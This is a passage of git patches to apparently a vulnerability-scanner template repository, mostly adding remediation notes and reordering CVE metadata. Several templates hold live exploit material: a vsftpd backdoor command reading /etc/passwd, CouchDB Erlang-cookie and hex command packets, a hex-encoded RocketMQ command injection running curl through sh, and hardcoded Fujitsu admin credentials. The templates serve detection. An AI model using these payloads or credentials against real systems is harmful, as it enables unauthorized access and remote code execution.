10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted. + remediation: | + Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability. reference: - https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr - https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability @@ -17,14 +19,14 @@ info: cvss-score: 9.8 cve-id: CVE-2017-5689 epss-score: 0.97416 - cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* epss-percentile: 0.99888 + cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: title:"Active Management Technology" verified: true + max-request: 2 vendor: intel product: active_management_technology_firmware + shodan-query: title:"Active Management Technology" tags: cve,cve2017,amt,intel,tenable,kev http: diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 15ecad4ae3..a4109af385 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input. + remediation: | + Upgrade Kodi to a version that is not affected by the CVE-2017-5982 vulnerability. reference: - https://cxsecurity.com/issue/WLB-2017020164 - https://www.exploit-db.com/exploits/41312/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-5982 cwe-id: CWE-22 epss-score: 0.0488 - cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* epss-percentile: 0.91748 + cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kodi diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index b0a02af8ad..ad9d44c25e 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. + remediation: | + Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability. reference: - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 @@ -15,13 +17,13 @@ info: cve-id: CVE-2017-6090 cwe-id: CWE-434 epss-score: 0.97282 - cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* epss-percentile: 0.9978 + cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"PhpCollab" vendor: phpcollab product: phpcollab + shodan-query: http.title:"PhpCollab" tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive http: diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index b1346c461f..a9eebf6dc0 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If Date: Wed, 6 Sep 2023 18:58:19 +0530 Subject: [PATCH 0200/1090] Updated network CVEs --- network/cves/2001/CVE-2001-1473.yaml | 2 +- network/cves/2011/CVE-2011-2523.yaml | 9 ++++----- network/cves/2015/CVE-2015-3306.yaml | 3 +-- network/cves/2016/CVE-2016-2004.yaml | 5 ++--- network/cves/2017/CVE-2017-3881.yaml | 3 +-- network/cves/2017/CVE-2017-5645.yaml | 6 ++---- network/cves/2018/CVE-2018-2628.yaml | 3 +-- network/cves/2020/CVE-2020-1938.yaml | 5 ++--- network/cves/2020/CVE-2020-7247.yaml | 2 +- network/cves/2021/CVE-2021-44521.yaml | 2 +- network/cves/2022/CVE-2022-0543.yaml | 5 ++--- network/cves/2022/CVE-2022-24706.yaml | 10 ++++------ network/cves/2022/CVE-2022-31793.yaml | 5 ++--- network/cves/2023/CVE-2023-33246.yaml | 9 ++++----- 14 files changed, 28 insertions(+), 41 deletions(-) diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index 251950d35e..eceb3e855e 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -5,12 +5,12 @@ info: author: iamthefrogy severity: high description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - http://www.kb.cert.org/vuls/id/684820 - https://exchange.xforce.ibmcloud.com/vulnerabilities/6603 - remediation: Upgrade to SSH 2.4 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index 0ca883df20..a1c22ab8ce 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -6,14 +6,14 @@ info: severity: critical description: | VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted. + remediation: | + Update to the latest version of VSFTPD, which does not contain the backdoor. reference: - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ - https://www.exploit-db.com/exploits/49757 - http://packetstormsecurity.com/files/162145/vsftpd-2.3.4-Backdoor-Command-Execution.html - https://access.redhat.com/security/cve/cve-2011-2523 - https://security-tracker.debian.org/tracker/CVE-2011-2523 - remediation: | - Update to the latest version of VSFTPD, which does not contain the backdoor. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -22,15 +22,14 @@ info: epss-score: 0.87236 cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: product:"vsftpd" + max-request: 2 vendor: vsftpd_project product: vsftpd + shodan-query: product:"vsftpd" tags: cve,cve2011,network,vsftpd,ftp,backdoor variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs - tcp: - host: - "{{Host}}:21" diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index a96d4b8ad9..fe810d10ef 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -5,13 +5,13 @@ info: author: pdteam severity: critical description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. + remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. reference: - https://github.com/t0kx/exploit-CVE-2015-3306 - https://www.exploit-db.com/exploits/36803/ - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html - https://nvd.nist.gov/vuln/detail/CVE-2015-3306 - remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 @@ -24,7 +24,6 @@ info: vendor: proftpd product: proftpd tags: cve,cve2015,ftp,rce,network,proftpd,edb - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index c27cdf36f3..cf73fce93f 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -5,14 +5,14 @@ info: author: pussycat0x severity: critical description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. + remediation: | + Upgrade to the most recent version of HP Data Protector. reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - http://www.kb.cert.org/vuls/id/267328 - https://www.exploit-db.com/exploits/39858/ - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html - remediation: | - Upgrade to the most recent version of HP Data Protector. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -25,7 +25,6 @@ info: vendor: hp product: data_protector tags: cve,cve2016,network,iot,hp,rce,edb - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index 4a8d198e66..1c75e515f5 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -6,13 +6,13 @@ info: severity: critical description: | A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. + remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access. reference: - https://github.com/artkond/cisco-rce - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md - https://nvd.nist.gov/vuln/detail/CVE-2017-3881 - http://www.securitytracker.com/id/1038059 - remediation: Deactivate a telnet connection or employ Access Control Lists (ACLs) to limit access. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -25,7 +25,6 @@ info: vendor: cisco product: ios tags: cve,cve2017,cisco,rce,network,kev,msf - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index 851864c04d..120bcc3720 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -6,14 +6,14 @@ info: severity: critical description: | In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. + remediation: | + Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. reference: - https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 - https://nvd.nist.gov/vuln/detail/CVE-2017-5645 - http://www.openwall.com/lists/oss-security/2019/12/19/2 - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html - remediation: | - Consider updating to Log4j 2.15.0 or a newer version, deactivating JNDI lookups, or implementing a Java Agent to safeguard against potentially harmful JNDI lookups. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -26,10 +26,8 @@ info: vendor: apache product: log4j tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast, - variables: end: "\r\n" - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 73ebce9994..a02bc3a0b0 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -6,13 +6,13 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory reference: - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 - https://nvd.nist.gov/vuln/detail/CVE-2018-2628 - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://web.archive.org/web/20211207132829/https://securitytracker.com/id/1040696 - http://www.securitytracker.com/id/1040696 - remediation: Install the suitable patch as per the Oracle Critical Patch Update advisory classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -25,7 +25,6 @@ info: vendor: oracle product: weblogic_server tags: cve,cve2018,oracle,weblogic,network,deserialization,kev - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 5773e17845..045b9a321a 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -5,13 +5,13 @@ info: author: milo2012 severity: critical description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. + remediation: https://access.redhat.com/solutions/4851251 reference: - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 - https://nvd.nist.gov/vuln/detail/CVE-2020-1938 - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html - remediation: https://access.redhat.com/solutions/4851251 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -21,11 +21,10 @@ info: cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:* metadata: max-request: 4 - shodan-query: title:"Apache Tomcat" vendor: apache product: geode + shodan-query: title:"Apache Tomcat" tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index 5d94083eae..96bff3c7f6 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -6,13 +6,13 @@ info: severity: critical description: | OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation. + remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6 reference: - https://www.openwall.com/lists/oss-security/2020/01/28/3 - https://nvd.nist.gov/vuln/detail/CVE-2020-7247 - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45 - http://www.openwall.com/lists/oss-security/2020/01/28/3 - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html - remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index 912f9a2602..6bdae518ae 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -5,6 +5,7 @@ info: author: Y4er severity: critical description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.' + remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 reference: - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 @@ -12,7 +13,6 @@ info: - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 - http://www.openwall.com/lists/oss-security/2022/02/11/4 - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/ - remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index a9eadc6d7e..96b18d66b1 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -9,13 +9,13 @@ info: vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. + remediation: Update to the most recent versions currently available. reference: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - https://bugs.debian.org/1005787 - https://www.debian.org/security/2022/dsa-5081 - https://lists.debian.org/debian-security-announce/2022/msg00048.html - remediation: Update to the most recent versions currently available. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 @@ -24,11 +24,10 @@ info: cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:* metadata: max-request: 4 - shodan-query: redis_version vendor: redis product: redis + shodan-query: redis_version tags: cve,cve2022,network,redis,unauth,rce,kev - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 6942ada8b2..7d05c564ec 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -6,14 +6,14 @@ info: severity: critical description: | In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. + remediation: | + Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. reference: - https://www.exploit-db.com/exploits/50914 - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py - https://nvd.nist.gov/vuln/detail/CVE-2022-24706 - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 - remediation: | - Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -22,19 +22,17 @@ info: epss-score: 0.97407 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: product:"CouchDB" verified: "true" + max-request: 2 vendor: apache product: couchdb + shodan-query: product:"CouchDB" tags: cve,cve2022,network,couch,rce,kev - variables: name_msg: "00156e00050007499c4141414141414041414141414141" challenge_reply: "00157201020304" cookie: "monster" cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572" - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index e91482f252..8c4b279082 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -6,13 +6,13 @@ info: severity: high description: | muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. + remediation: Update the application to version 1.10 reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - https://derekabdine.com/blog/2022-arris-advisory - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ - http://inglorion.net/software/muhttpd/ - remediation: Update the application to version 1.10 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -21,12 +21,11 @@ info: epss-score: 0.25931 cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: inglorion product: muhttpd tags: cve,cve2022,network,muhttpd,lfi,unauth - tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 03cf077353..51c2a56a98 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -6,13 +6,13 @@ info: severity: critical description: | For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x . + remediation: Update the RocketMQ application to version 5.1.1 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-33246 - https://github.com/I5N0rth/CVE-2023-33246 - http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html - http://www.openwall.com/lists/oss-security/2023/07/12/1 - https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp - remediation: Update the RocketMQ application to version 5.1.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -21,14 +21,13 @@ info: epss-score: 0.95581 cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:* metadata: - fofa-query: protocol="rocketmq" - max-request: 2 - shodan-query: title:"RocketMQ" verified: true + max-request: 2 vendor: apache product: rocketmq + shodan-query: title:"RocketMQ" + fofa-query: protocol="rocketmq" tags: cve,cve2023,rocketmq,rce,oast,intrusive,network - variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' part_b: '{{ hex_decode("3b0a") }}' From e2ff461a49ab69d31449d038ad22a6685156e1eb Mon Sep 17 00:00:00 2001 From: Adnan Khan Date: Wed, 6 Sep 2023 11:14:55 -0400 Subject: [PATCH 0201/1090] Added CVE-2023-38433 Template --- network/cves/2023/CVE-2023-38433.yaml | 41 +++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 network/cves/2023/CVE-2023-38433.yaml diff --git a/network/cves/2023/CVE-2023-38433.yaml b/network/cves/2023/CVE-2023-38433.yaml new file mode 100644 index 0000000000..45d684495f --- /dev/null +++ b/network/cves/2023/CVE-2023-38433.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-38433 +info: + name: Fujitsu IP series Hardcoded Credentials + author: AdnaneKhan + severity: high + description: | + Fujitsu Real-time Video Transmission Gear uses hard-coded credentials. The credentials cannot be changed by the end-user and provide administrative access to the devices. + reference: + - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-38433 + - https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01 + - https://www.fujitsu.com/global/products/computing/peripheral/video/download/ + - https://jvn.jp/en/jp/JVN95727578/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cwe-id: CWE-798 + metadata: + max-req: 2 + shodan-query: server:"thttpd/2.25b 29dec2003" content-length:1133 + tags: cve,cve2023,panel,login,backdoor + +http: + - raw: + - | + GET /b_download/index.html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('fedish264pro:h264pro@broadsight')}} + - | + GET /b_download/index.html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64('fedish265pro:h265pro@broadsight')}} + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Field Support' + - type: status + status: + - 200 \ No newline at end of file From cbb812f1de428f05c74e7ba2502656e6dd428648 Mon Sep 17 00:00:00 2001 From: Adnan Khan Date: Wed, 6 Sep 2023 11:16:55 -0400 Subject: [PATCH 0202/1090] Update description --- network/cves/2023/CVE-2023-38433.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/cves/2023/CVE-2023-38433.yaml b/network/cves/2023/CVE-2023-38433.yaml index 45d684495f..dae8a53129 100644 --- a/network/cves/2023/CVE-2023-38433.yaml +++ b/network/cves/2023/CVE-2023-38433.yaml @@ -4,7 +4,7 @@ info: author: AdnaneKhan severity: high description: | - Fujitsu Real-time Video Transmission Gear uses hard-coded credentials. The credentials cannot be changed by the end-user and provide administrative access to the devices. + Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices. reference: - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials/ - https://nvd.nist.gov/vuln/detail/CVE-2023-38433 From b97ab6a9dea425593a584ad39fac31e8ed66fa79 Mon Sep 17 00:00:00 2001 From: Adnan Khan Date: Wed, 6 Sep 2023 11:24:32 -0400 Subject: [PATCH 0203/1090] Fix shodan query string --- network/cves/2023/CVE-2023-38433.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/network/cves/2023/CVE-2023-38433.yaml b/network/cves/2023/CVE-2023-38433.yaml index dae8a53129..7fb5676d08 100644 --- a/network/cves/2023/CVE-2023-38433.yaml +++ b/network/cves/2023/CVE-2023-38433.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-798 metadata: max-req: 2 - shodan-query: server:"thttpd/2.25b 29dec2003" content-length:1133 + shodan-query: "Server: thttpd/2.25b 29dec2003" content-length:1133 tags: cve,cve2023,panel,login,backdoor http: @@ -38,4 +38,4 @@ http: - 'Field Support' - type: status status: - - 200 \ No newline at end of file + - 200 From 498f3577062f04e0786df1a413d1f9d9316de3d0 Mon Sep 17 00:00:00 2001 From: "Neriberto C.Prado" Date: Tue, 5 Sep 2023 08:09:52 -0300 Subject: [PATCH 0204/1090] Update template pi-hole-detect.yaml to detect new versions --- http/technologies/pi-hole-detect.yaml | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/http/technologies/pi-hole-detect.yaml b/http/technologies/pi-hole-detect.yaml index 0391aa6698..f10a1dddc0 100644 --- a/http/technologies/pi-hole-detect.yaml +++ b/http/technologies/pi-hole-detect.yaml @@ -12,6 +12,9 @@ http: - method: GET path: - "{{BaseURL}}/admin/index.php" + - 